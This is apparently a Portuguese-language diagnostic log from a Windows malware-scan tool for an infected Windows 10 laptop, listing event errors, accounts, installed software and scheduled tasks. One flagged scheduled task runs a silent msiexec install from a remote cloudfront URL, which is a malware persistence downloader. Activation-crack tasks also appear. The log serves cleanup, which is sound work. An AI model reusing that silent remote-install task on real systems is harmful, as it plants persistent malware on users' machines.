A referência é UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0".
A definição é UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0".
Use o arquivo sxstrace.exe para obter um dignóstico detalhado.
Error: (05/22/2017 12:25:37 AM) (Source: SideBySide) (EventID: 35) (User: )
Description: Falha na geração de contexto de ativação para "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest". Erro no arquivo de manifesto ou de política C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL", na linha 1.
Identidade do componente localizado no manifesto não corresponde à identidade do componente solicitado.
A referência é UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0".
A definição é UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0".
Use o arquivo sxstrace.exe para obter um dignóstico detalhado.
Error: (05/19/2017 09:33:08 PM) (Source: SideBySide) (EventID: 35) (User: )
Description: Falha na geração de contexto de ativação para "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest". Erro no arquivo de manifesto ou de política C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL", na linha 1.
Identidade do componente localizado no manifesto não corresponde à identidade do componente solicitado.
A referência é UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0".
A definição é UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0".
Use o arquivo sxstrace.exe para obter um dignóstico detalhado.
Error: (05/19/2017 05:45:28 PM) (Source: KMS-QAD) (EventID: 1001) (User: )
Description: Event-ID 1001
Error: (05/19/2017 05:45:28 PM) (Source: DPTF) (EventID: 256) (User: )
Description: Intel(R) Dynamic Platform and Thermal Framework : ESIF(8.2.10900.330) TYPE: ERROR MODULE: DPTF TIME 36419 ms
DPTF Build Version: 8.2.10900.330
DPTF Build Date: May 16 2016 11:32:37
Source File: ..\..\..\Sources\Manager\WIPolicyActiveRelationshipTableChanged.cpp @ line 52
Executing Function: WIPolicyActiveRelationshipTableChanged::execute
Message: Unhandled exception caught during execution of work item
Framework Event: PolicyActiveRelationshipTableChanged [44]
Policy: Active Policy [0]
Exception Function: Policy::executePolicyActiveRelationshipTableChanged
Exception Text:
DPTF Build Version: 8.2.10900.330
DPTF Build Date: May 16 2016 11:32:37
Source File: ..\..\..\Sources\Manager\EsifServices.cpp @ line 457
Executing Function: EsifServices::primitiveExecuteGet
Message: Error returned from ESIF services interface function call
Participant: NoParticipant
Domain: NoDomain
ESIF Primitive: GET_ACTIVE_RELATIONSHIP_TABLE [89]
ESIF Instance: 255
ESIF Return Code: ESIF_E_UNSUPPORTED_ACTION_TYPE [1202]
Error: (05/19/2017 05:45:28 PM) (Source: DPTF) (EventID: 256) (User: )
Description: Intel(R) Dynamic Platform and Thermal Framework : ESIF(8.2.10900.330) TYPE: ERROR MODULE: DPTF TIME 36416 ms
DPTF Build Version: 8.2.10900.330
DPTF Build Date: May 16 2016 11:32:37
Source File: ..\..\..\Sources\Manager\WIPolicyActiveRelationshipTableChanged.cpp @ line 52
Executing Function: WIPolicyActiveRelationshipTableChanged::execute
Message: Unhandled exception caught during execution of work item
Framework Event: PolicyActiveRelationshipTableChanged [44]
Policy: Active Policy [0]
Exception Function: Policy::executePolicyActiveRelationshipTableChanged
Exception Text:
DPTF Build Version: 8.2.10900.330
DPTF Build Date: May 16 2016 11:32:37
Source File: ..\..\..\Sources\Manager\EsifServices.cpp @ line 457
Executing Function: EsifServices::primitiveExecuteGet
Message: Error returned from ESIF services interface function call
Participant: NoParticipant
Domain: NoDomain
ESIF Primitive: GET_ACTIVE_RELATIONSHIP_TABLE [89]
ESIF Instance: 255
ESIF Return Code: ESIF_E_UNSUPPORTED_ACTION_TYPE [1202]
Error: (05/19/2017 05:45:28 PM) (Source: DPTF) (EventID: 256) (User: )
Description: Intel(R) Dynamic Platform and Thermal Framework : ESIF(8.2.10900.330) TYPE: ERROR MODULE: DPTF TIME 36349 ms
DPTF Build Version: 8.2.10900.330
DPTF Build Date: May 16 2016 11:32:37
Source File: ..\..\..\Sources\Manager\WIPolicyActiveRelationshipTableChanged.cpp @ line 52
Executing Function: WIPolicyActiveRelationshipTableChanged::execute
Message: Unhandled exception caught during execution of work item
Framework Event: PolicyActiveRelationshipTableChanged [44]
Policy: Active Policy [0]
Exception Function: Policy::executePolicyActiveRelationshipTableChanged
Exception Text:
DPTF Build Version: 8.2.10900.330
DPTF Build Date: May 16 2016 11:32:37
Source File: ..\..\..\Sources\Manager\EsifServices.cpp @ line 457
Executing Function: EsifServices::primitiveExecuteGet
Message: Error returned from ESIF services interface function call
Participant: NoParticipant
Domain: NoDomain
ESIF Primitive: GET_ACTIVE_RELATIONSHIP_TABLE [89]
ESIF Instance: 255
ESIF Return Code: ESIF_E_UNSUPPORTED_ACTION_TYPE [1202]
Error: (05/19/2017 05:38:20 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-8PNOBD0)
Description: Falha na ativação do aplicativo Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI com o erro: -2147023170. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.
Error: (05/19/2017 05:38:18 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome do aplicativo com falha: SearchUI.exe, versão: 10.0.15063.0, carimbo de data/hora: 0x58ccbc95
Nome do módulo com falha: SearchUI.exe, versão: 10.0.15063.0, carimbo de data/hora: 0x58ccbc95
Código de exceção: 0xc000027b
Deslocamento da falha: 0x00000000001ae2e5
ID do processo com falha: 0x2d94
Hora de início do aplicativo com falha: 0x01d2d0dfd94560df
Caminho do aplicativo com falha: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
Caminho do módulo com falha: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
ID do Relatório: b0a3bbe1-f601-4d68-bd36-3557a674951e
Nome completo do pacote com falha: Microsoft.Windows.Cortana_1.8.12.15063_neutral_neutral_cw5n1h2txyewy
ID do aplicativo relativo ao pacote com falha: CortanaUI
Error: (05/19/2017 05:35:11 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Erro do serviço de cópias de sombra de volume: erro inesperado ao chamar a rotina CoCreateInstance. hr = 0x80004002, Não há suporte para esta interface
.
Operação:
Instanciando servidor VSS
Erros de Sistema:
=============
Error: (05/22/2017 12:22:07 AM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: As configurações de permissão específico do aplicativo não concedem permissão Local Ativação para o aplicativo de Servidor COM com CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
e APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
ao usuário AUTORIDADE NT\SISTEMA SID (S-1-5-18) do endereço LocalHost (Usando LRPC) que está sendo executado no contêiner de aplicativos Não Disponível SID (Não Disponível). Essa permissão de segurança pode ser modificada com a ferramenta administrativa Serviços de Componentes.
Error: (05/19/2017 05:45:28 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: O serviço KMS-R@1n terminou com o erro:
Parâmetro incorreto.
Error: (05/19/2017 05:45:28 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço CldFlt devido ao seguinte erro:
Não há suporte para o pedido.
Error: (05/19/2017 05:38:36 PM) (Source: Ntfs) (EventID: 55) (User: AUTORIDADE NT)
Description: Corrupção detectada na estrutura do sistema de arquivos, no volume C:.
A MFT (Tabela Mestra de Arquivos) contém um registro de arquivo corrompido. O número de referência do arquivo é 0x1000000042ebf. O nome do arquivo é "\Windows\System32\Windows.UI.BlockedShutdown.dll".
Error: (05/19/2017 05:38:34 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-8PNOBD0)
Description: O servidor {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} não se registrou no DCOM dentro do tempo limite necessário.
Error: (05/19/2017 05:38:34 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-8PNOBD0)
Description: O servidor {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} não se registrou no DCOM dentro do tempo limite necessário.
Error: (05/19/2017 05:38:34 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-8PNOBD0)
Description: O servidor {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} não se registrou no DCOM dentro do tempo limite necessário.
Error: (05/19/2017 05:38:34 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-8PNOBD0)
Description: O servidor {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} não se registrou no DCOM dentro do tempo limite necessário.
Error: (05/19/2017 05:38:34 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-8PNOBD0)
Description: O servidor {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} não se registrou no DCOM dentro do tempo limite necessário.
Error: (05/19/2017 05:38:33 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-8PNOBD0)
Description: O servidor {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} não se registrou no DCOM dentro do tempo limite necessário.
CodeIntegrity:
===================================
Date: 2017-05-19 19:32:43.995
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nvdmi.inf_amd64_323791d5eb27505c\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2017-05-17 12:13:40.579
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nvdmi.inf_amd64_323791d5eb27505c\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2017-05-15 09:56:28.440
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nvdmi.inf_amd64_323791d5eb27505c\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2017-05-11 10:00:26.476
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nvdmi.inf_amd64_323791d5eb27505c\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2017-05-05 18:18:15.227
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nvdmi.inf_amd64_323791d5eb27505c\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2017-05-02 22:50:41.585
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nvdmi.inf_amd64_323791d5eb27505c\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2017-04-27 18:35:27.905
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nvdmi.inf_amd64_323791d5eb27505c\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2017-04-21 14:26:09.987
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nvdmi.inf_amd64_323791d5eb27505c\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2017-04-18 13:56:12.535
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nvdmi.inf_amd64_ea62e0c945f71b38\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.
==================== Informações da Memória ===========================
Processador: Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz
Percentagem de memória em uso: 46%
RAM física total: 8064.97 MB
RAM física disponível: 4277.23 MB
Virtual Total: 12672.97 MB
Virtual disponível: 8718.25 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:930.96 GB) (Free:582.02 GB) NTFS
==================== MBR & Tabela de Partições ==================
========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: D495127E)
Partition: GPT.
==================== Fim de Addition.txt ============================
Executado por Note (22-05-2017 08:49:11)
Executando a partir de C:\Users\Note\Downloads
Windows 10 Pro Versão 1703 (X64) (2017-04-17 12:26:28)
Modo da Inicialização: Normal
==========================================================
==================== Contas: =============================
Administrador (S-1-5-21-1810685751-3673504307-3616125758-500 - Administrator - Enabled) => C:\Users\Administrador
Convidado (S-1-5-21-1810685751-3673504307-3616125758-501 - Limited - Disabled)
DefaultAccount (S-1-5-21-1810685751-3673504307-3616125758-503 - Limited - Disabled)
defaultuser0 (S-1-5-21-1810685751-3673504307-3616125758-1000 - Limited - Disabled) => C:\Users\defaultuser0
Note (S-1-5-21-1810685751-3673504307-3616125758-1001 - Administrator - Enabled) => C:\Users\Note
==================== Central de Segurança ========================
(Se uma entrada for incluída na fixlist, será removida.)
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Programas Instalados ======================
(Somente os programas adwares com a indicação "Oculto" podem ser adicionados à fixlist para desocultá-los. Os programas adwares devem ser desinstalados manualmente.)
µTorrent (HKU\S-1-5-21-1810685751-3673504307-3616125758-1001\...\uTorrent) (Version: 3.5.0.43580 - BitTorrent Inc.)
Adobe Acrobat Reader DC - Português (HKLM-x32\...\{AC76BA86-7AD7-1046-7B44-AC0F074E4100}) (Version: 17.009.20044 - Adobe Systems Incorporated)
Ansel (Version: 381.65 - NVIDIA Corporation) Hidden
Atualizações da NVIDIA 25.0.0.0 (Version: 25.0.0.0 - NVIDIA Corporation) Hidden
Blizzard App (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
Counter-Strike: Global Offensive (HKLM\...\Steam App 730) (Version: - Valve)
Dell System Detect (HKU\S-1-5-21-1810685751-3673504307-3616125758-1001\...\d24084d039586cae) (Version: 8.4.0.5 - Dell)
Discord (HKU\S-1-5-21-1810685751-3673504307-3616125758-1001\...\Discord) (Version: 0.0.297 - Hammer & Chisel, Inc.)
Glary Utilities 5.71 (HKLM-x32\...\Glary Utilities 5) (Version: 5.71.0.92 - Glarysoft Ltd)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 58.0.3029.110 - Google Inc.)
Google Update Helper (x32 Version: 1.3.33.5 - Google Inc.) Hidden
Grand Theft Auto V (HKLM-x32\...\R3JhbmRUaGVmdEF1dG9W_is1) (Version: 1 - )
H1Z1: King of the Kill (HKLM\...\Steam App 433850) (Version: - Daybreak Game Company)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 21.20.16.4590 - Intel Corporation)
Malwarebytes versão 3.0.6.1469 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.0.6.1469 - Malwarebytes)
Maxx Audio Installer (x64) (Version: 2.6.8627.1 - Waves Audio Ltd.) Hidden
Microsoft Office Professional Plus 2016 - pt-br (HKLM\...\ProPlusRetail - pt-br) (Version: 16.0.7967.2161 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1810685751-3673504307-3616125758-1001\...\OneDriveSetup.exe) (Version: 17.3.6816.0313 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Mozilla Firefox 52.0.1 (x86 pt-BR) (HKLM-x32\...\Mozilla Firefox 52.0.1 (x86 pt-BR)) (Version: 52.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 52.0.1 - Mozilla)
NVIDIA Driver de gráficos 381.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 381.65 - NVIDIA Corporation)
NVIDIA Driver do 3D Vision 381.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 381.65 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.6.0.74 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.6.0.74 - NVIDIA Corporation)
NVIDIA Software do sistema PhysX 9.17.0329 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.17.0329 - NVIDIA Corporation)
NvNodejs (Version: 3.6.0.74 - NVIDIA Corporation) Hidden
NvTelemetry (Version: 2.4.10.0 - NVIDIA Corporation) Hidden
NvvHci (Version: 2.02.0.5 - NVIDIA Corporation) Hidden
Office 16 Click-to-Run Extensibility Component (x32 Version: 16.0.7967.2161 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (Version: 16.0.7967.2161 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (Version: 16.0.7967.2161 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (x32 Version: 16.0.7668.2066 - Microsoft Corporation) Hidden
Overwatch (HKLM-x32\...\Overwatch) (Version: - Blizzard Entertainment)
Painel de controle da NVIDIA 381.65 (Version: 381.65 - NVIDIA Corporation) Hidden
PLAYERUNKNOWN'S BATTLEGROUNDS (HKLM\...\Steam App 578080) (Version: - Bluehole, Inc.)
Popcorn-Time (HKU\S-1-5-21-1810685751-3673504307-3616125758-1001\...\Popcorn-Time) (Version: 0.3.10 - Popcorn Time)
PowerISO (HKLM-x32\...\PowerISO) (Version: 4.6 - PowerISO Computing, Inc.)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.10586.21289 - Realtek Semiconduct Corp.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7908 - Realtek Semiconductor Corp.)
RESIDENT EVIL 7 biohazard version Update 3 (HKLM-x32\...\RESIDENT EVIL 7 biohazard_is1) (Version: Update 3 - GMT-MAX.ORG)
Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 1.1.5.8 - Rockstar Games)
SHIELD Streaming (Version: 7.1.0370 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 3.6.0.74 - NVIDIA Corporation) Hidden
Spotify (HKU\S-1-5-21-1810685751-3673504307-3616125758-1001\...\Spotify) (Version: 1.0.54.1079.g3809528e - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Windows 10 Update and Privacy Settings (HKLM\...\{293F2009-0145-450B-B4AA-063D43FB368C}) (Version: 1.0.13.0 - Microsoft Corporation)
WinRAR 5.40 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)
==================== Exame Personalizado CLSID (Whitelisted): ==========================
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
==================== Tarefas Agendadas (Whitelisted) =============
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
Task: {00A82C33-E245-47DE-9BB5-DB1E5DD2B85F} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [2017-05-03] (NVIDIA Corporation)
Task: {110D4B01-04F3-4DB7-9BF7-BE9244DDA060} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-05-03] (NVIDIA Corporation)
Task: {1560FB29-201E-43D3-BD18-226CE2261401} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2017-05-03] (NVIDIA Corporation)
Task: {305C6219-3132-49F2-8DD2-8A6DAC50D50D} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2017-05-13] (Microsoft Corporation)
Task: {343ECDB8-FDF1-4209-BCAF-B5FE58043297} - \Microsoft\Windows\MemoryDiagnostic\VideoMemoryDiagnostic -> Nenhum Arquivo <==== ATENÇÃO
Task: {443C1DD6-8600-4E22-A5C7-65C954FBA1A9} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-05-04] (Microsoft Corporation)
Task: {4F704AB1-40EE-4F31-9A03-05866D021DE3} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-05-03] (NVIDIA Corporation)
Task: {6C8B1B0C-8C31-4027-93C7-C75F9BAC52B2} - System32\Tasks\Microsoft\Windows\DeviceSettings\Vijervernuy => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=TOSHIBAXMQ02ABD100H_17BLT1WCTXX17BLT1WCT&d=20170519 /q <==== ATENÇÃO
Task: {7ADEA196-8115-4393-A40D-122A8AD0381F} - System32\Tasks\R@1n-KMS\Windows64Professional => wmic
Task: {7F1FCA61-08A3-4A8F-B715-3A3C78E54EF0} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-03-24] (Google Inc.)
Task: {943989CC-3E61-4D2D-8224-DFD19C9054E5} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2017-05-03] (NVIDIA Corporation)
Task: {9C6F9DD3-5A71-4F4F-8ECA-41F1C1EFA728} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-05-03] (NVIDIA Corporation)
Task: {9F4F6F89-7984-4653-8994-EEC142685CDE} - System32\Tasks\GlaryInitialize 5 => C:\Program Files (x86)\Glary Utilities 5\Initialize.exe [2017-03-12] (Glarysoft Ltd)
Task: {A1049936-4008-4AF6-88FE-CC9EE16B2FED} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2017-05-03] (NVIDIA Corporation)
Task: {A68B37C4-4E31-40ED-B720-913CE066789D} - \Cat Defender -> Nenhum Arquivo <==== ATENÇÃO
Task: {AD04FFA9-3434-4DDE-8186-E58289FCA127} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-03-24] (Google Inc.)
Task: {AFE36DE3-3BD0-40BE-A132-A5E5E3C7ACCF} - System32\Tasks\GU5SkipUAC => C:\Program Files (x86)\Glary Utilities 5\Integrator.exe [2017-04-23] (Glarysoft Ltd)
Task: {B5B5BB5E-D286-4BFB-994C-11406214829C} - System32\Tasks\RtHDVBg_PushButton => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2016-09-07] (Realtek Semiconductor)
Task: {B8F62A2E-374B-4A6C-A6B4-A97E7ECFD8EC} - System32\Tasks\Driver Booster SkipUAC (Note) => C:\Program Files (x86)\IObit\Driver Booster\4.4.0\DriverBooster.exe
Task: {BC66A3C5-90D8-4423-B350-BA7727988086} - \Microsoft\Windows\Multimedia\Manager -> Nenhum Arquivo <==== ATENÇÃO
Task: {CC55B2D5-8A40-41E5-AF37-97B78829AFB8} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-05-04] (Microsoft Corporation)
Task: {E37872A4-0995-4206-99CF-055CED9F5B82} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-04-25] (Adobe Systems Incorporated)
Task: {F63D9408-36B9-4D8B-B80D-6A85FA627444} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2017-05-13] (Microsoft Corporation)
Task: {FE103227-1AF9-4E1E-8D17-FED2BE24F4A9} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-05-03] (NVIDIA Corporation)
(Se uma entrada for incluída na fixlist, o arquivo da tarefa (.job) será movido. O arquivo que está sendo executado pela tarefa não será movido.)
Task: C:\WINDOWS\Tasks\GlaryInitialize 5.job => C:\Program Files (x86)\Glary Utilities 5\Initialize.exe
Task: C:\WINDOWS\Tasks\GU5SkipUAC.job => C:\Program Files (x86)\Glary Utilities 5\Integrator.exe
==================== Atalhos =============================
(As entradas podem ser listadas para serem restauradas ou removidas.)
ShortcutWithArgument: C:\Users\Note\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) ->
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) ->
==================== Módulos Carregados (Whitelisted) ==============
2017-03-24 16:37 - 2017-05-03 17:21 - 01267320 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll
2017-03-18 17:58 - 2017-03-18 17:58 - 00138000 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll
2017-03-18 17:59 - 2017-03-20 00:59 - 01731072 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-05-12 08:34 - 2017-05-09 06:13 - 03767640 _____ () C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\libglesv2.dll
2017-05-12 08:34 - 2017-05-09 06:13 - 00100696 _____ () C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\libegl.dll
2017-03-24 16:37 - 2017-05-03 17:21 - 01040504 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\libprotobuf.dll
2017-03-24 15:31 - 2017-03-09 21:13 - 00674592 _____ () C:\Program Files (x86)\Steam\SDL2.dll
2017-03-24 15:31 - 2016-08-31 22:02 - 04969248 _____ () C:\Program Files (x86)\Steam\v8.dll
2017-03-24 15:31 - 2017-04-25 20:55 - 02465056 _____ () C:\Program Files (x86)\Steam\video.dll
2017-03-24 15:30 - 2016-01-27 04:49 - 00491008 _____ () C:\Program Files (x86)\Steam\libavformat-56.dll
2017-03-24 15:30 - 2016-01-27 04:49 - 02549760 _____ () C:\Program Files (x86)\Steam\libavcodec-56.dll
2017-03-24 15:30 - 2016-01-27 04:49 - 00332800 _____ () C:\Program Files (x86)\Steam\libavresample-2.dll
2017-03-24 15:30 - 2016-01-27 04:49 - 00442880 _____ () C:\Program Files (x86)\Steam\libavutil-54.dll
2017-03-24 15:30 - 2016-01-27 04:49 - 00485888 _____ () C:\Program Files (x86)\Steam\libswscale-3.dll
2017-03-24 15:30 - 2016-08-31 22:02 - 01563936 _____ () C:\Program Files (x86)\Steam\icui18n.dll
2017-03-24 15:31 - 2016-08-31 22:02 - 01195296 _____ () C:\Program Files (x86)\Steam\icuuc.dll
2017-03-24 15:31 - 2017-04-25 20:55 - 00848672 _____ () C:\Program Files (x86)\Steam\bin\chromehtml.DLL
2017-03-24 15:30 - 2016-07-04 19:17 - 00266560 _____ () C:\Program Files (x86)\Steam\openvr_api.dll
2017-03-24 15:33 - 2017-01-30 18:41 - 68875552 _____ () C:\Program Files (x86)\Steam\bin\cef\cef.win7\libcef.dll
2017-03-24 15:31 - 2017-04-25 20:55 - 00383776 _____ () C:\Program Files (x86)\Steam\steam.dll
2017-04-23 22:45 - 2017-04-23 22:45 - 00089088 _____ () C:\Program Files (x86)\Glary Utilities 5\zlib1.dll
==================== Alternate Data Streams (Whitelisted) =========
(Se uma entrada for incluída na fixlist, somente o ADS será removido.)
==================== Modo de Segurança (Whitelisted) ===================
(Se uma entrada for incluída na fixlist, será removida do Registro. O valor "AlternateShell" será restaurado.)
